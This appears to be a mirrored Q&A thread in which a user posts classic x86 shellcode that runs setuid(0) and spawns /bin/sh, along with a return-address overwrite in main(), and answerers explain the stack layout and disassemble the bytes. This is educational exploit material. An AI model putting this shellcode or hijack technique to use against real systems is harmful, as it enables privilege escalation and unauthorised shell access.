谁能给我解释一下这段代码吗?

发布于 2024-08-30 07:20:30 字数 663 浏览 12 评论 0原文

警告:这是一个漏洞。不要执行此代码。

//shellcode.c

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() { 
    int *ret; //ret pointer for manipulating saved return.

    ret = (int *)&ret + 2; //setret to point to the saved return
                           //value on the stack.

    (*ret) = (int)shellcode; //change the saved return value to the
                             //address of the shellcode, so it executes.
}

谁能给我更好的解释?

WARNING: This is an exploit. Do not execute this code.

//shellcode.c

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() { 
    int *ret; //ret pointer for manipulating saved return.

    ret = (int *)&ret + 2; //setret to point to the saved return
                           //value on the stack.

    (*ret) = (int)shellcode; //change the saved return value to the
                             //address of the shellcode, so it executes.
}

can anyone give me a better explanation ?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(7

泪冰清 2024-09-06 07:20:30

显然,这段代码试图更改堆栈,以便当 main 函数返回时,程序执行不会定期返回到运行时库(通常会终止程序),而是会跳转到代码中保存在 shellcode 数组中。

1) int *ret;

在堆栈上定义一个变量,位于 main 函数参数的下方。

2) ret = (int *)&ret + 2;

ret 变量指向 int * 位于堆栈上 ret 之上的两个 int。据推测,这就是返回地址所在的位置,当 main 返回时程序将继续执行。

2) (*ret) = (int)shellcode;

返回地址设置为 shellcode 数组内容的地址,因此 < code>shellcode 的内容将在 main 返回时执行。


shellcode 似乎包含可能执行系统调用来启动 /bin/sh 的机器指令。我可能是错的,因为我实际上没有反汇编 shellcode


PS:此代码依赖于机器和编译器,可能无法在所有平台上运行。


回答你的第二个问题:

如果我使用会发生什么
ret=(int)&ret +2 为什么我们要加 2?
为什么不是3个或4个???我认为 int
是 4 个字节,所以 2 将是 8 个字节,不是吗?

ret 被声明为 int*,因此分配一个 int (例如(int)&ret) 这将是一个错误。至于为什么添加 2 而不是任何其他数字:显然是因为此代码假设返回地址将位于堆栈上的该位置。请考虑以下内容:

  • 此代码假设当向其推送某些内容时,调用堆栈会向下增长(例如,对于英特尔处理器,调用堆栈确实如此)。这就是为什么数字被相加而不是被减去的原因:返回地址位于比自动(本地)变量(例如ret< /code>)。

  • 根据我在 Intel 组装时的记忆,C 函数通常是这样调用的:首先,所有参数都以相反的顺序(从右到左)压入堆栈。然后,调用该函数。返回地址因此被压入堆栈。然后,建立一个新的堆栈帧,其中包括将ebp寄存器压入堆栈。然后,局部变量被设置在堆栈上,位于迄今为止已推送到堆栈上的所有内容的下方。

现在我假设您的程序具有以下堆栈布局:

+-------------------------+
|  function arguments     |                       |
|  (e.g. argv, argc)      |                       |  (note: the stack
+-------------------------+   <-- ss:esp + 12     |   grows downward!)
|  return address         |                       |
+-------------------------+   <-- ss:esp + 8      V
|  saved ebp register     |                       
+-------------------------+   <-- ss:esp + 4  /  ss:ebp - 0  (see code below)
|  local variable (ret)   |                       
+-------------------------+   <-- ss:esp + 0  /  ss:ebp - 4

底部是 ret (这是一个 32 位整数)。上面是保存的ebp寄存器(也是32位宽)。上面是 32 位返回地址。 (上面是 main 的参数 - argcargv - 但这些在这里并不重要。)当函数执行时,堆栈指针指向ret。返回地址位于 ret 之上的 64 位,对应于

ret = (int*)&ret + 2; 

It is + 2 中的 + 2,因为 ret code> 是一个 int*,而 int 是 32 位,因此加 2 意味着将其设置为高于 2 × 32 位(=64 位)的内存位置>(int*)&ret... 如果上段中的所有假设都正确,这将是返回地址的位置。


游览:让我用英特尔汇编语言演示如何调用 C 函数可能(如果我没记错的话——我不是这个主题的专家,所以我可能是错的) ):

// first, push all function arguments on the stack in reverse order:
push  argv
push  argc

// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call  main

// (afterwards: clean up stack by removing the function arguments, e.g.:)
add   esp, 8

在 main 内部,可能会发生以下情况:

// create a new stack frame and make room for local variables:
push  ebp
mov   ebp, esp
sub   esp, 4

// access return address:
mov   edi, ss:[ebp+4]

// access argument 'argc'
mov   eax, ss:[ebp+8]

// access argument 'argv'
mov   ebx, ss:[ebp+12]

// access local variable 'ret'
mov   edx, ss:[ebp-4]

...

// restore stack frame and return to caller (by popping the return address)
mov   esp, ebp
pop   ebp
retf

另请参阅: C 中的过程调用序列,了解此主题的另一种解释。

Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.

1) int *ret;

defines a variable on the stack, just beneath the main function's arguments.

2) ret = (int *)&ret + 2;

lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.

2) (*ret) = (int)shellcode;

The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.


shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.


P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.


Reply to your second question:

and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?

ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:

  • This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).

  • From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.

Now I assume the following stack layout for your program:

+-------------------------+
|  function arguments     |                       |
|  (e.g. argv, argc)      |                       |  (note: the stack
+-------------------------+   <-- ss:esp + 12     |   grows downward!)
|  return address         |                       |
+-------------------------+   <-- ss:esp + 8      V
|  saved ebp register     |                       
+-------------------------+   <-- ss:esp + 4  /  ss:ebp - 0  (see code below)
|  local variable (ret)   |                       
+-------------------------+   <-- ss:esp + 0  /  ss:ebp - 4

At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in

ret = (int*)&ret + 2; 

It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.


Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):

// first, push all function arguments on the stack in reverse order:
push  argv
push  argc

// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call  main

// (afterwards: clean up stack by removing the function arguments, e.g.:)
add   esp, 8

Inside main, the following might happen:

// create a new stack frame and make room for local variables:
push  ebp
mov   ebp, esp
sub   esp, 4

// access return address:
mov   edi, ss:[ebp+4]

// access argument 'argc'
mov   eax, ss:[ebp+8]

// access argument 'argv'
mov   ebx, ss:[ebp+12]

// access local variable 'ret'
mov   edx, ss:[ebp-4]

...

// restore stack frame and return to caller (by popping the return address)
mov   esp, ebp
pop   ebp
retf

See also: Description of the procedure call sequence in C for another explanation of this topic.

琉璃繁缕 2024-09-06 07:20:30

实际的 shellcode 是:

(gdb) x /25i &shellcode
0x804a040 <shellcode>:      xor    %eax,%eax
0x804a042 <shellcode+2>:    xor    %ebx,%ebx
0x804a044 <shellcode+4>:    mov    $0x17,%al
0x804a046 <shellcode+6>:    int    $0x80
0x804a048 <shellcode+8>:    jmp    0x804a069 <shellcode+41>
0x804a04a <shellcode+10>:   pop    %esi
0x804a04b <shellcode+11>:   mov    %esi,0x8(%esi)
0x804a04e <shellcode+14>:   xor    %eax,%eax
0x804a050 <shellcode+16>:   mov    %al,0x7(%esi)
0x804a053 <shellcode+19>:   mov    %eax,0xc(%esi)
0x804a056 <shellcode+22>:   mov    $0xb,%al
0x804a058 <shellcode+24>:   mov    %esi,%ebx
0x804a05a <shellcode+26>:   lea    0x8(%esi),%ecx
0x804a05d <shellcode+29>:   lea    0xc(%esi),%edx
0x804a060 <shellcode+32>:   int    $0x80
0x804a062 <shellcode+34>:   xor    %ebx,%ebx
0x804a064 <shellcode+36>:   mov    %ebx,%eax
0x804a066 <shellcode+38>:   inc    %eax
0x804a067 <shellcode+39>:   int    $0x80
0x804a069 <shellcode+41>:   call   0x804a04a <shellcode+10>
0x804a06e <shellcode+46>:   das    
0x804a06f <shellcode+47>:   bound  %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>:   das    
0x804a073 <shellcode+51>:   jae    0x804a0dd
0x804a075 <shellcode+53>:   add    %al,(%eax)

这大致对应于

setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);

The actual shellcode is:

(gdb) x /25i &shellcode
0x804a040 <shellcode>:      xor    %eax,%eax
0x804a042 <shellcode+2>:    xor    %ebx,%ebx
0x804a044 <shellcode+4>:    mov    $0x17,%al
0x804a046 <shellcode+6>:    int    $0x80
0x804a048 <shellcode+8>:    jmp    0x804a069 <shellcode+41>
0x804a04a <shellcode+10>:   pop    %esi
0x804a04b <shellcode+11>:   mov    %esi,0x8(%esi)
0x804a04e <shellcode+14>:   xor    %eax,%eax
0x804a050 <shellcode+16>:   mov    %al,0x7(%esi)
0x804a053 <shellcode+19>:   mov    %eax,0xc(%esi)
0x804a056 <shellcode+22>:   mov    $0xb,%al
0x804a058 <shellcode+24>:   mov    %esi,%ebx
0x804a05a <shellcode+26>:   lea    0x8(%esi),%ecx
0x804a05d <shellcode+29>:   lea    0xc(%esi),%edx
0x804a060 <shellcode+32>:   int    $0x80
0x804a062 <shellcode+34>:   xor    %ebx,%ebx
0x804a064 <shellcode+36>:   mov    %ebx,%eax
0x804a066 <shellcode+38>:   inc    %eax
0x804a067 <shellcode+39>:   int    $0x80
0x804a069 <shellcode+41>:   call   0x804a04a <shellcode+10>
0x804a06e <shellcode+46>:   das    
0x804a06f <shellcode+47>:   bound  %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>:   das    
0x804a073 <shellcode+51>:   jae    0x804a0dd
0x804a075 <shellcode+53>:   add    %al,(%eax)

This corresponds to roughly

setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
故人如初 2024-09-06 07:20:30

该字符串来自缓冲区溢出的旧文档,并将执行 /bin/sh。由于它是恶意代码(好吧,当与缓冲区利用配对时) - 您下次应该真正包含它的来源。

在同一文档中,如何编写基于堆栈的漏洞利用代码

/* the shellcode is hex for: */
      #include <stdio.h>
       main() { 
       char *name[2]; 
       name[0] = "sh"; 
       name[1] = NULL;
       execve("/bin/sh",name,NULL);
          } 

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
         \x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
         \xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

您包含的代码会导致执行 shellcode[] 的内容,运行 execve ,并提供对 shell 的访问。那么 Shellcode 这个术语呢?来自维基百科

在计算机安全中,shellcode 是
用作的一小段代码
利用的有效负载
软件漏洞。它被称为
“shellcode”,因为它通常
启动一个命令 shell,从中
攻击者可以控制受损的
机器。 Shellcode一般是这样写的
在机器代码中,但任何代码段
执行类似任务的可以是
称为 shellcode。

That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit) - you should really include it's origin next time.

From that same document, how to code stack based exploits :

/* the shellcode is hex for: */
      #include <stdio.h>
       main() { 
       char *name[2]; 
       name[0] = "sh"; 
       name[1] = NULL;
       execve("/bin/sh",name,NULL);
          } 

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
         \x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
         \xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :

In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.

一向肩并 2024-09-06 07:20:30

无需查找所有实际操作码进行确认,shellcode 数组就包含执行 /bin/sh 所需的机器代码。这个 shellcode 是精心构造的机器代码,用于执行所需的操作特定的目标平台,并且不包含任何 null 字节。

main() 中的代码正在更改返回地址和执行流程,以便使程序通过执行 shellcode 数组中的指令来生成 shell。

请参阅为了乐趣和利润而粉碎堆栈,了解如何操作的说明可以创建这样的 shellcode 以及如何使用它。

Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.

The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.

See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.

荒芜了季节 2024-09-06 07:20:30

该字符串包含一系列以十六进制表示的字节。

这些字节对特定平台上的特定处理器(希望是您的平台)上的一系列指令进行编码。 (编辑:如果它是恶意软件,希望不是你的!)

该变量的定义只是为了获取堆栈的句柄。一个书签,如果你愿意的话。然后使用指针算术(同样与平台相关)来操纵程序的状态,以使处理器跳转到并执行字符串中的字节。

The string contains a series of bytes represented in hexadecimal.

The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)

The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.

梦太阳 2024-09-06 07:20:30

每个 \xXX 都是一个十六进制数。一个、两个或三个这样的数字一起形成一个操作码(谷歌搜索)。它们一起形成可以或多或少直接由机器执行的装配。这段代码尝试执行 shellcode。

我认为 shellcode 试图生成一个 shell。

Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code tries to execute the shellcode.

I think the shellcode tries to spawn a shell.

意犹 2024-09-06 07:20:30

这只是生成 /bin/sh,例如在 C 中,如 execve("/bin/sh", NULL, NULL);

This is just spawn /bin/sh, for example in C like execve("/bin/sh", NULL, NULL);

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文